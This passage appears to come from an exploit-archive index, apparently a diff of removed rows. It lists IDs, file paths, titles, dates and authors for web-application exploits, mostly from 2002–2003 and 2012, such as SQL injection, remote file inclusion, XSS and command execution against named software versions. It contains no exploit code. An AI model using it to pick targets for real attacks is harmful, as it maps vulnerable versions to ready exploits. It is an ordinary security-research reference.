-21905,exploits/php/webapps/21905.txt,"phpMyNewsletter 0.6.10 - Remote File Inclusion",2002-10-03,frog,php,webapps, -21906,exploits/php/webapps/21906.txt,"phpLinkat 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2002-10-04,Sp.IC,php,webapps, -21912,exploits/php/webapps/21912.txt,"Killer Protection 1.0 - Information Disclosure",2002-10-07,frog,php,webapps, -21914,exploits/asp/webapps/21914.txt,"SSGBook 1.0 - Image Tag HTML Injection",2002-10-08,frog,asp,webapps, -21918,exploits/php/webapps/21918.html,"VBZoom 1.0 - SQL Injection",2002-10-08,hish,php,webapps, -21920,exploits/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 - Cross-Site Scripting",2002-10-09,overclocking_a_la_abuela,asp,webapps, -21921,exploits/php/webapps/21921.txt,"VBZoom 1.0 - Arbitrary File Upload",2002-10-09,hish,php,webapps, -21924,exploits/asp/webapps/21924.txt,"SurfControl SuperScout Email Filter 3.5 - 'MsgError.asp' Cross-Site Scripting",2002-10-08,ken@FTU,asp,webapps, -21925,exploits/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 - User Credential Disclosure",2002-10-08,ken@FTU,asp,webapps, -21926,exploits/cgi/webapps/21926.txt,"Authoria HR Suite - 'AthCGI.exe' Cross-Site Scripting",2002-10-09,Max,cgi,webapps, -21930,exploits/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 - 'browse.php' Cross-Site Scripting",2002-10-10,"Arab VieruZ",php,webapps, -21929,exploits/php/webapps/21929.rb,"Project Pier - Arbitrary File Upload (Metasploit)",2012-10-16,Metasploit,php,webapps, -21931,exploits/php/webapps/21931.txt,"PHPBBMod 1.3.3 - PHPInfo Information Disclosure",2002-10-10,"Roland Verlander",php,webapps, -21933,exploits/php/webapps/21933.txt,"PHPRank 1.8 - 'add.php' Cross-Site Scripting",2002-10-10,"Jedi/Sector One",php,webapps, -21946,exploits/java/webapps/21946.txt,"vBulletin 2.0/2.2.x - Cross-Site Scripting",2002-10-18,Sp.IC,java,webapps, -21950,exploits/php/webapps/21950.txt,"YaBB 1.40/1.41 - Login Cross-Site Scripting",2002-10-18,"Nir Adar",php,webapps, -21956,exploits/php/webapps/21956.txt,"KMMail 1.0 - E-Mail HTML Injection",2002-10-21,"Ulf Harnhammar",php,webapps, -21957,exploits/php/webapps/21957.txt,"PHP Arena PAFileDB 1.1.3/2.1.1/3.0 - 'Email To Friend' Cross-Site Scripting",2002-10-21,ersatz,php,webapps, -21960,exploits/php/webapps/21960.txt,"gBook 1.4 - Administrative Access",2002-10-22,frog,php,webapps, -21961,exploits/php/webapps/21961.txt,"MyMarket 1.71 - 'Form_Header.php' Cross-Site Scripting",2002-10-23,qber66,php,webapps, -21962,exploits/cgi/webapps/21962.txt,"Mojo Mail 2.7 - Email Form Cross-Site Scripting",2002-10-24,"Daniel Boland",cgi,webapps, -21966,exploits/cgi/webapps/21966.txt,"MailReader.com 2.3.x - 'NPH-MR.cgi' File Disclosure",2002-10-28,pokleyzz,cgi,webapps, -21967,exploits/php/webapps/21967.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'entete.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps, -21968,exploits/php/webapps/21968.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'enteteacceuil.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps, -21969,exploits/php/webapps/21969.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'index.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps, -21970,exploits/php/webapps/21970.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'newtopic.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps, -21976,exploits/php/webapps/21976.txt,"Jason Orcutt Prometheus 3.0/4.0/6.0 - Remote File Inclusion",2002-11-01,"Karol Wiesek",php,webapps, -21977,exploits/php/webapps/21977.txt,"PHP-Nuke 5.6 - 'modules.php' SQL Injection",2002-11-01,kill9,php,webapps, -21979,exploits/cgi/webapps/21979.txt,"ION Script 1.4 - Remote File Disclosure",2002-11-01,"Zero X",cgi,webapps, -21989,exploits/php/webapps/21989.txt,"Cartweaver 3 - Local File Inclusion",2012-10-15,HaxOr,php,webapps, -21990,exploits/php/webapps/21990.txt,"airVisionNVR 1.1.13 - 'readfile()' Disclosure / SQL Injection",2012-10-15,pennyGrit,php,webapps, -21992,exploits/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",hardware,webapps, -21995,exploits/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps, -22003,exploits/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - 'albums.php?album' SQL Injection",2012-10-16,Zixem,php,webapps, -22004,exploits/php/webapps/22004.txt,"Joomla! Component com_icagenda - 'id' Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps, -22005,exploits/hardware/webapps/22005.txt,"Visual Tools DVR3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps, -22009,exploits/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 - Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps, -22015,exploits/cgi/webapps/22015.txt,"W3Mail 1.0.6 - File Disclosure",2002-11-12,"Tim Brown",cgi,webapps, -22017,exploits/php/webapps/22017.txt,"phpBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion",2002-11-13,"Hai Nam Luke",php,webapps, -22030,exploits/php/webapps/22030.php,"vBulletin 2.0/2.2.x - 'memberlist.php' Cross-Site Scripting",2002-11-22,Sp.IC,php,webapps, -22037,exploits/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",php,webapps, -22038,exploits/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,cr4wl3r,php,webapps, -22039,exploits/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps, -22040,exploits/jsp/webapps/22040.txt,"ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps, -22041,exploits/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps, -22042,exploits/php/webapps/22042.php,"vBulletin 2.0.x/2.2.x - 'members2.php' Cross-Site Scripting",2002-11-25,Sp.IC,php,webapps, -22043,exploits/php/webapps/22043.txt,"phpBB 2.0.3 - Script Injection",2002-11-25,"Pete Foster",php,webapps, -22044,exploits/php/webapps/22044.txt,"Web Server Creator Web Portal 0.1 - Remote File Inclusion",2002-11-25,frog,php,webapps, -22045,exploits/cgi/webapps/22045.txt,"Working Resources BadBlue 1.7.1 - Search Page Cross-Site Scripting",2002-11-25,"Matthew Murphy",cgi,webapps, -22047,exploits/php/webapps/22047.txt,"FreeNews 2.1 - Include Undefined Variable Command Execution",2002-11-26,frog,php,webapps, -22048,exploits/php/webapps/22048.txt,"News Evolution 1.0/2.0 - Include Undefined Variable Command Execution",2002-11-26,frog,php,webapps, -22050,exploits/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'imageFolio.cgi?direct' Cross-Site Scripting",2002-11-27,SecurityTracker.com,cgi,webapps, -22051,exploits/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'nph-build.cgi' Cross-Site Scripting",2002-11-27,SecurityTracker.com,cgi,webapps, -22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",cgi,webapps, -22065,exploits/php/webapps/22065.html,"phpBB 2.0.3 - 'search.php' Cross-Site Scripting",2002-12-03,f_a_a,php,webapps, -22070,exploits/windows/webapps/22070.py,"OTRS 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps, -22071,exploits/php/webapps/22071.txt,"WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps, -22075,exploits/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final Beta - 'viewtopic.php' Directory Contents Browsing",2002-11-08,euronymous,php,webapps, -22076,exploits/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final Beta - 'viewtopic.php' Cross-Site Scripting",2002-11-08,euronymous,php,webapps, -22077,exploits/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 - HTML Injection",2002-11-09,"Dorin Balanica",php,webapps, -22080,exploits/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps, -22083,exploits/php/webapps/22083.txt,"Deerfield VisNetic WebSite 3.5.13.1 - Cross-Site Scripting",2002-12-12,"Ory Segal",php,webapps, -22086,exploits/php/webapps/22086.txt,"Mambo Site Server 4.0.11 - 'PHPInfo.php' Information Disclosure",2002-12-12,euronymous,php,webapps, -22087,exploits/php/webapps/22087.txt,"Mambo Site Server 4.0.11 - Full Path Disclosure",2002-12-12,euronymous,php,webapps, -22088,exploits/php/webapps/22088.txt,"MyPHPSoft MyPHPLinks 2.1.9/2.2 - SQL Injection Administration Bypassing",2002-12-14,frog,php,webapps, -22089,exploits/php/webapps/22089.txt,"PHP-Nuke 6.0 - Web Mail Remote PHP Script Execution",2002-12-16,"Ulf Harnhammar",php,webapps, -22090,exploits/php/webapps/22090.txt,"PHP-Nuke 6.0 - Web Mail Script Injection",2002-12-16,"Ulf Harnhammar",php,webapps, -22092,exploits/multiple/webapps/22092.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Directory Traversal",2012-10-19,xistence,multiple,webapps, -22097,exploits/php/webapps/22097.txt,"Joomla! Component com_fss 1.9.1.1447 - SQL Injection",2012-10-19,D4NB4R,php,webapps, -22098,exploits/php/webapps/22098.txt,"Joomla! Component com_tag - 'tag' SQL Injection",2012-10-19,D4NB4R,php,webapps, -22099,exploits/php/webapps/22099.txt,"CMSQLite 1.3.2 - Multiple Vulnerabilities",2012-10-19,Vulnerability-Lab,php,webapps, -22102,exploits/php/webapps/22102.txt,"PHP-Nuke 6.0 - Multiple Full Path Disclosure Vulnerabilities",2002-12-16,frog,php,webapps, -22103,exploits/php/webapps/22103.txt,"PHP-Nuke 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2002-12-16,frog,php,webapps, -22104,exploits/php/webapps/22104.txt,"Captaris Infinite WebMail 3.61.5 - HTML Injection",2002-12-16,"Pedram Amini",php,webapps, -22107,exploits/php/webapps/22107.txt,"SPGPartenaires 3.0.1 - 'ident.php' SQL Injection",2002-12-20,frog,php,webapps, -22108,exploits/php/webapps/22108.txt,"SPGPartenaires 3.0.1 - 'delete.php' SQL Injection",2002-12-20,frog,php,webapps, -22109,exploits/php/webapps/22109.txt,"W-Agora 4.1.6 - 'EditForm.php' Cross-Site Scripting",2002-12-22,xatr0z,php,webapps, -22111,exploits/cgi/webapps/22111.pl,"CHETCPASSWD 1.12 - Shadow File Disclosure",2002-12-22,"Victor Pereira",cgi,webapps, -22114,exploits/php/webapps/22114.txt,"PEEL 1.0b - Remote File Inclusion",2002-12-31,frog,php,webapps, -22115,exploits/php/webapps/22115.txt,"N/X Web Content Management System 2002 Prerelease 1 - 'menu.inc.php?c_path' Remote File Inclusion",2003-01-02,frog,php,webapps, -22116,exploits/php/webapps/22116.txt,"N/X Web Content Management System 2002 Prerelease 1 - 'datasets.php?c_path' Local File Inclusion",2003-01-02,frog,php,webapps, -22125,exploits/php/webapps/22125.txt,"OpenTopic 2.3.1 - Private Message HTML Injection",2003-01-06,frog,php,webapps, -22126,exploits/php/webapps/22126.txt,"DCP-Portal 5.0.1 - 'editor.php?Root' Remote File Inclusion",2003-01-06,frog,php,webapps, -22127,exploits/php/webapps/22127.txt,"DCP-Portal 5.0.1 - 'lib.php?Root' Remote File Inclusion",2003-01-06,frog,php,webapps, -22133,exploits/php/webapps/22133.txt,"myPHPNuke 1.8.8 - 'Default_Theme' Cross-Site Scripting",2003-01-06,Mindwarper,php,webapps, -22134,exploits/php/webapps/22134.txt,"S8Forum 3.0 - Remote Command Execution",2003-01-06,nmsh_sa,php,webapps, -22137,exploits/cgi/webapps/22137.txt,"FormMail-Clone - Cross-Site Scripting",2003-01-09,"Rynho Zeros Web",cgi,webapps, -22146,exploits/php/webapps/22146.txt,"YABB 1.4.1 SE - 'Reminder.php' SQL Injection",2003-01-12,"VOID.AT Security",php,webapps, -22148,exploits/php/webapps/22148.txt,"PHPPass 2 - 'AccessControl.php' SQL Injection",2003-01-13,frog,php,webapps, -22149,exploits/php/webapps/22149.txt,"W-Agora 4.1.6 - 'index.php?bn' Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps, -22150,exploits/php/webapps/22150.txt,"W-Agora 4.1.6 - 'modules.php?File' Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps, -22151,exploits/php/webapps/22151.txt,"Movable Type Pro 5.13en - Persistent Cross-Site Scripting",2012-10-22,sqlhacker,php,webapps, -22152,exploits/php/webapps/22152.txt,"Joomla! Component com_commedia - 'task' SQL Injection",2012-10-22,D4NB4R,php,webapps, -22153,exploits/php/webapps/22153.pl,"Joomla! Component com_kunena - 'search' SQL Injection",2012-10-22,D35m0nd142,php,webapps, -22156,exploits/php/webapps/22156.txt,"WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps, -22157,exploits/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - 'id' SQL Injection",2012-10-22,Cumi,php,webapps, -22158,exploits/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps, -22159,exploits/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps, -22160,exploits/php/webapps/22160.txt,"ATutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps, -22163,exploits/php/webapps/22163.txt,"Geeklog 1.3.7 - 'profiles.php' Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps, -22164,exploits/php/webapps/22164.txt,"Geeklog 1.3.7 - 'users.php?uid' Cross-Site Scripting",2003-01-14,snooq,php,webapps, -22165,exploits/php/webapps/22165.txt,"Geeklog 1.3.7 - 'comment.php?cid' Cross-Site Scripting",2003-01-14,snooq,php,webapps, -22166,exploits/php/webapps/22166.txt,"Geeklog 1.3.7 - 'Homepage User' HTML Injection",2003-01-14,snooq,php,webapps, -22167,exploits/php/webapps/22167.txt,"vAuthenticate 2.8 - SQL Injection",2003-01-14,frog,php,webapps, -22168,exploits/php/webapps/22168.txt,"vSignup 2.1 - SQL Injection",2003-01-14,frog,php,webapps, -22169,exploits/cgi/webapps/22169.pl,"Psunami Bulletin Board 0.x - 'Psunami.cgi' Remote Command Execution (1)",2003-01-13,dodo,cgi,webapps, -22170,exploits/cgi/webapps/22170.pl,"Psunami Bulletin Board 0.x - 'Psunami.cgi' Remote Command Execution (2)",2003-01-13,spabam,cgi,webapps, -22175,exploits/php/webapps/22175.txt,"PHP TopSites 2.0/2.2 - HTML Injection",2003-01-15,"Cyberarmy Application",php,webapps, -22176,exploits/php/webapps/22176.txt,"PHP TopSites 2.0/2.2 - 'help.php' Cross-Site Scripting",2003-01-15,"Cyberarmy Application",php,webapps, -22177,exploits/php/webapps/22177.txt,"PHP TopSites 2.0/2.2 - 'edit.php' SQL Injection",2003-01-15,"Cyberarmy Application",php,webapps, -22180,exploits/php/webapps/22180.txt,"PHPLinks 2.1.2 - Add Site HTML Injection",2003-01-16,JeiAr,php,webapps, -22181,exploits/php/webapps/22181.txt,"ClanSphere 2011.3 - 'cs_lang' Cookie Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps, -22182,exploits/php/webapps/22182.pl,"phpBB 2.0.3 - 'privmsg.php' SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps, -22186,exploits/php/webapps/22186.txt,"MyRoom 3.5 GOLD - 'save_item.php' Arbitrary File Upload",2003-01-20,frog,php,webapps, -22279,exploits/php/webapps/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Inclusion",2003-02-24,"Karol Wiesek",php,webapps, -22192,exploits/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 - 'Packages.php' Remote File Inclusion",2003-01-22,spabam,php,webapps, -22195,exploits/php/webapps/22195.txt,"PHPOutsourcing Zorum 3.x - Remote File Inclusion Command Execution",2003-01-22,MGhz,php,webapps, -22198,exploits/cgi/webapps/22198.txt,"GNU Mailman 2.1 - 'email' Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps, -22199,exploits/cgi/webapps/22199.txt,"GNU Mailman 2.1 - Error Page Cross-Site Scripting",2003-01-24,webmaster@procheckup.com,cgi,webapps, -22202,exploits/php/webapps/22202.txt,"FTLS Guestbook 1.1 - Script Injection",2003-01-25,BrainRawt,php,webapps, -22204,exploits/cgi/webapps/22204.txt,"MultiHTML 1.5 - File Disclosure",2000-09-13,"Niels Heinen",cgi,webapps, -22206,exploits/php/webapps/22206.txt,"Nukebrowser 2.x - Remote File Inclusion",2003-01-30,Havenard,php,webapps, -22208,exploits/php/webapps/22208.txt,"myphpPageTool 0.4.3-1 - Remote File Inclusion",2003-02-03,frog,php,webapps, -22209,exploits/php/webapps/22209.txt,"PHPMyShop 1.0 - 'compte.php' SQL Injection",2003-02-03,frog,php,webapps, -22211,exploits/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 - Avatar HTML Injection",2003-02-03,delusion,php,webapps, -40414,exploits/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087/9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps, -22222,exploits/php/webapps/22222.txt,"TOPO 1.41 - Full Path Disclosure",2003-02-04,"Rynho Zeros Web",php,webapps, -22227,exploits/cgi/webapps/22227.txt,"FileSeek CGI Script - Remote Command Execution",2002-04-16,"Thijs Bosschert",cgi,webapps, -22228,exploits/cgi/webapps/22228.txt,"FileSeek - CGI Script File Disclosure",2002-04-16,"Thijs Bosschert",cgi,webapps, -22241,exploits/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 - Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps, -22242,exploits/php/webapps/22242.txt,"Cedric Email Reader 0.4 - Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps, -22252,exploits/php/webapps/22252.txt,"PHP-Board 1.0 - User Password Disclosure",2003-02-15,frog,php,webapps, -22253,exploits/php/webapps/22253.txt,"DotBr 0.1 - 'System.php3' Remote Command Execution",2003-02-15,frog,php,webapps, -22254,exploits/php/webapps/22254.txt,"DotBr 0.1 - 'Exec.php3' Remote Command Execution",2003-02-15,frog,php,webapps, -22256,exploits/php/webapps/22256.txt,"D-Forum 1 - 'header' Remote File Inclusion",2003-02-18,frog,php,webapps, -22257,exploits/php/webapps/22257.txt,"D-Forum 1 - 'footer' Remote File Inclusion",2003-02-18,frog,php,webapps, -22260,exploits/cgi/webapps/22260.c,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (1)",2003-02-19,bob,cgi,webapps, -22261,exploits/cgi/webapps/22261.pl,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (2)",2003-02-19,CaMaLeoN,cgi,webapps, -22262,exploits/cgi/webapps/22262.pl,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (3)",2003-02-19,SPAX,cgi,webapps, -22263,exploits/cgi/webapps/22263.pl,"cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (4)",2003-02-19,pokleyzz,cgi,webapps, -22266,exploits/php/webapps/22266.php,"PHP-Nuke 5.6/6.0 - Search Engine SQL Injection",2003-02-19,"David Zentner",php,webapps, -22267,exploits/php/webapps/22267.php,"PHPBB2 - 'Page_Header.php' SQL Injection",2003-02-19,"David Zentner",php,webapps, -22268,exploits/php/webapps/22268.txt,"myPHPNuke 1.8.8 - 'links.php' Cross-Site Scripting",2003-02-20,"Tacettin Karadeniz",php,webapps, -22277,exploits/php/webapps/22277.txt,"Nuked-klaN 1.3 - Remote Information Disclosure",2003-02-23,"gregory Le Bras",php,webapps, -22281,exploits/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 - Cookie Validation",2003-02-24,"Simen Bergo",php,webapps, -22282,exploits/php/webapps/22282.txt,"WihPhoto 0.86 dev - 'sendphoto.php' File Disclosure",2003-02-24,frog,php,webapps, -22283,exploits/php/webapps/22283.txt,"CuteNews 0.88 - 'shownews.php' Remote File Inclusion",2003-02-25,Over_G,php,webapps, -22284,exploits/php/webapps/22284.txt,"CuteNews 0.88 - 'search.php' Remote File Inclusion",2003-02-25,Over_G,php,webapps, -22285,exploits/php/webapps/22285.txt,"CuteNews 0.88 - 'comments.php' Remote File Inclusion",2003-02-25,Over_G,php,webapps, -22293,exploits/php/webapps/22293.txt,"E-theni - Remote File Inclusion Command Execution",2003-01-06,frog,php,webapps, -22295,exploits/php/webapps/22295.txt,"Invision Board 1.1.1 - 'ipchat.php' Remote File Inclusion",2003-02-27,frog,php,webapps, -22297,exploits/php/webapps/22297.pl,"Typo3 3.5 b5 - 'showpic.php' File Enumeration",2003-02-28,"Martin Eiszner",php,webapps, -22298,exploits/php/webapps/22298.txt,"Typo3 3.5 b5 - 'Translations.php' Remote File Inclusion",2003-02-28,"Martin Eiszner",php,webapps, -22300,exploits/php/webapps/22300.txt,"WordPress Plugin Easy Webinar - Blind SQL Injection",2012-10-28,"Robert Cooper",php,webapps, -22315,exploits/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps, -22316,exploits/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps, -22317,exploits/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps, -40413,exploits/php/webapps/40413.txt,"Joomla! Component com_videogallerylite 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80 -22318,exploits/php/webapps/22318.txt,"Webchat 0.77 - 'Defines.php' Remote File Inclusion",2003-03-03,frog,php,webapps, -22336,exploits/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution",2003-03-06,"gregory Le Bras",php,webapps, -22337,exploits/cgi/webapps/22337.txt,"Wordit Logbook 098b3 - Logbook.pl Remote Command Execution",2003-03-07,"Aleksey Sintsov",cgi,webapps, -22339,exploits/php/webapps/22339.txt,"SimpleBBS 1.0.6 - 'users.php' Insecure File Permissions",2003-03-07,flur,php,webapps, -22343,exploits/php/webapps/22343.txt,"VPOPMail 0.9x - 'vpopmail.php' Remote Command Execution",2003-03-11,ERRor,php,webapps, -22347,exploits/php/webapps/22347.txt,"PHP-Nuke 5.5/6.0 AvantGo Module - Full Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps, -22348,exploits/php/webapps/22348.txt,"PHP-Nuke 5.5/6.0 News Module - Full Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps, -22349,exploits/php/webapps/22349.txt,"PHP-Nuke Splatt Forum 3.2 Module - Full Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps, -22357,exploits/asp/webapps/22357.txt,"RSA ClearTrust 4.6/4.7 - Login Page Cross-Site Scripting",2003-03-15,sir.mordred@hushmail.com,asp,webapps, -22364,exploits/cgi/webapps/22364.c,"Outblaze Webmail - Cookie Authentication Bypass",2003-03-17,"dong-h0un U",cgi,webapps, -22372,exploits/php/webapps/22372.txt,"vam shop 1.69 - Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps, -22373,exploits/php/webapps/22373.txt,"PG Dating Pro CMS 1.0 - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps, -22374,exploits/php/webapps/22374.txt,"WordPress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps, -22377,exploits/cgi/webapps/22377.txt,"Kebi Academy 2001 - Input Validation",2003-03-17,"dong-h0un U",cgi,webapps, -22378,exploits/php/webapps/22378.txt,"MyABraCaDaWeb 1.0 - Full Path Disclosure",2003-03-17,"gregory Le Bras",php,webapps, -22380,exploits/cgi/webapps/22380.pl,"Smart Search 4.25 - Remote Command Execution",2003-01-05,knight420,cgi,webapps, -22382,exploits/php/webapps/22382.txt,"Mambo Site Server 4.0.10 - 'index.php' Cross-Site Scripting",2003-03-18,"Ertan Kurt",php,webapps, -22383,exploits/php/webapps/22383.txt,"Basit 1.0 Submit Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps, -22385,exploits/php/webapps/22385.txt,"Basit 1.0 Search Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps, -22386,exploits/php/webapps/22386.txt,"Siteframe CMS 2.2.4 - 'download.php' Information Disclosure",2003-03-19,"Ertan Kurt",php,webapps, -22387,exploits/php/webapps/22387.txt,"DCP-Portal 5.3.1 - 'calendar.php' Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps, -22389,exploits/php/webapps/22389.txt,"XOOPS 2.0 XoopsOption - Information Disclosure",2003-03-20,"gregory Le Bras",php,webapps, -22391,exploits/php/webapps/22391.txt,"osCommerce 2.1/2.2 - Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps, -22392,exploits/php/webapps/22392.txt,"osCommerce 2.1/2.2 - Info_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps, -22393,exploits/php/webapps/22393.txt,"osCommerce 2.1/2.2 - 'Checkout_Payment.php' Error Output Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps, -22396,exploits/php/webapps/22396.txt,"WordPress Plugin bbPress - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps, -22398,exploits/php/webapps/22398.php,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps, -22399,exploits/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-11-01,"CYBSEC Labs",php,webapps, -22403,exploits/php/webapps/22403.txt,"Joomla! Component Spider Catalog 1.1 - 'Product_ID' SQL Injection",2012-11-01,D4NB4R,php,webapps, -22405,exploits/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps, -22408,exploits/cgi/webapps/22408.txt,"Planetmoon - Guestbook Clear Text Password Retrieval",2003-03-21,subj,cgi,webapps, -22411,exploits/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - 'banners.php' Banner Manager Password Disclosure",2003-03-22,frog,php,webapps, -22412,exploits/php/webapps/22412.txt,"Advanced Poll 2.0 - Remote Information Disclosure",2003-03-22,subj,php,webapps, -40412,exploits/php/webapps/40412.txt,"Exponent CMS 2.3.9 - Blind SQL Injection",2016-09-22,"Manuel García Cárdenas",php,webapps,80 -22413,exploits/php/webapps/22413.txt,"PHP-Nuke 5.6/6.x News Module - 'article.php' SQL Injection",2003-03-22,frog,php,webapps, -22414,exploits/php/webapps/22414.php,"PHP-Nuke 5.6/6.x News Module - 'index.php' SQL Injection",2003-03-23,frog,php,webapps, -22421,exploits/php/webapps/22421.txt,"Web Chat Manager 2.0 - HTML Code Injection",2003-03-25,Over_G,php,webapps, -22422,exploits/php/webapps/22422.txt,"PHP-Nuke 6.5 Addon - 'Viewpage.php' File Disclosure",2003-03-25,"Zero-X www.lobnan.de Team",php,webapps, -22423,exploits/php/webapps/22423.txt,"PHP-Nuke 6.0/6.5 Forum Module - 'viewtopic.php' SQL Injection",2003-03-25,frog,php,webapps, -22424,exploits/php/webapps/22424.txt,"PHP-Nuke 6.0/6.5 Forum Module - 'viewforum.php' SQL Injection",2003-03-25,frog,php,webapps, -22427,exploits/php/webapps/22427.txt,"WordPress Plugin All Video Gallery 1.1 - SQL Injection",2012-11-02,"Ashiyane Digital Security Team",php,webapps, -22521,exploits/php/webapps/22521.c,"XMB Forum 1.8 - 'member.php' SQL Injection",2003-04-22,zeez@bbugs.org,php,webapps, -22429,exploits/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection",2012-11-02,Juno_okyo,php,webapps, -22430,exploits/php/webapps/22430.txt,"PrestaShop 1.5.1 - Persistent Cross-Site Scripting",2012-11-02,"David Sopas",php,webapps, -22431,exploits/php/webapps/22431.txt,"Achievo 1.4.5 - Multiple Vulnerabilities (1)",2012-11-02,"Canberk BOLAT",php,webapps, -22436,exploits/asp/webapps/22436.txt,"MyGuestBK - 'Add.asp' Cross-Site Scripting",2002-03-27,Over_G,asp,webapps, -22437,exploits/asp/webapps/22437.txt,"MyGuestBK - Unauthorized Admin Panel Access",2002-03-27,Over_G,asp,webapps, -22438,exploits/php/webapps/22438.txt,"PostNuke 0.72x Stats Module - Full Path Disclosure",2003-03-28,rkc,php,webapps, -22439,exploits/php/webapps/22439.txt,"PostNuke 0.72x Members_List Module - Full Path Disclosure",2003-03-28,rkc,php,webapps, -43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,hardware,webapps, -43149,exploits/aspx/webapps/43149.txt,"LanSweeper 